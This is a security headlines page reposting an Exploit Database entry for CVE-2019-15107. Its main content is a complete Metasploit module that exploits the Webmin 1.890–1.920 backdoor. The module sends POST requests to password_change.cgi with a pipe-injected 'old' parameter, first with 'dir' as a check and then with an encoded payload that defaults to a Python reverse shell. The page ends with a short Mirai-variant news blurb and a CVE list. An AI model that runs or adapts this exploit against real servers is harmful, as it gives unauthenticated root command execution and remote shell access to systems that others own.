Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2019-15107: Offensive Security’s Exploit Database Archive

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

CVE
#vulnerability#web#linux#git#backdoor#rce#perl#auth#ssl

Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)

Platform:****Linux

Date:****2019-08-12

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin 1.920 Unauthenticated RCE',
      'Description'        => %q{
        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
        Only the SourceForge downloads were backdoored, but they are listed as
        official downloads on the project's site.

        Unknown attacker(s) inserted Perl qx statements into the build server's
        source code on two separate occasions: once in April 2018, introducing
        the backdoor in the 1.890 release, and in July 2018, reintroducing the
        backdoor in releases 1.900 through 1.920.

        Only version 1.890 is exploitable in the default install. Later affected
        versions require the expired password changing feature to be enabled.
      },
      'Author'         => [
        'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
      ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-'],
          ['URL', 'https://www.pentest.com.tr']
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'DefaultOptions' =>
        {
          'RPORT' => 10000,
          'SSL'   => false,
          'PAYLOAD' => 'cmd/unix/reverse_python'
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Webmin <= 1.910', {}]],
      'DisclosureDate' => 'May 16 2019',
      'DefaultTarget'  => 0)
    )
    register_options [
        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
    ]
  end

  def peer
    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
  end
  ##
  # Target and input verification
  ##
  def check
    # check passwd change priv
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
      'headers' =>
        {
          'Referer' => "#{peer}/session_login.cgi"
        },
      'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
    })

    if res && res.code == 200 && res.body =~ /Failed/
      res = send_request_cgi(
        {
        'method' => 'POST',
        'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
        'ctype'  => 'application/x-www-form-urlencoded',
        'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
        'headers' =>
          {
            'Referer' => "#{peer}/session_login.cgi"
          },
        'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
        })

      if res && res.code == 200 && res.body =~ /password_change.cgi/
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    else
      return CheckCode::Safe
    end
  end

  ##
  # Exploiting phase
  ##
  def exploit

    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    command = payload.encoded
    print_status("Attempting to execute the payload...")
    handler
    res = send_request_cgi(
      {
      'method' => 'POST',
      'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
      'ctype'  => 'application/x-www-form-urlencoded',
      'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
      'headers' =>
        {
          'Referer' => "#{peer}/session_login.cgi"
        },
      'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
      })

  end
end

Related news

Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

By Waqas The V3G4 malware was caught leveraging several vulnerabilities in IoT devices to spread its infection from July to December of 2022. This is a post from HackRead.com Read the original post: Mirai Variant V3G4 Exploiting IoT Devices for DDoS Attacks

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907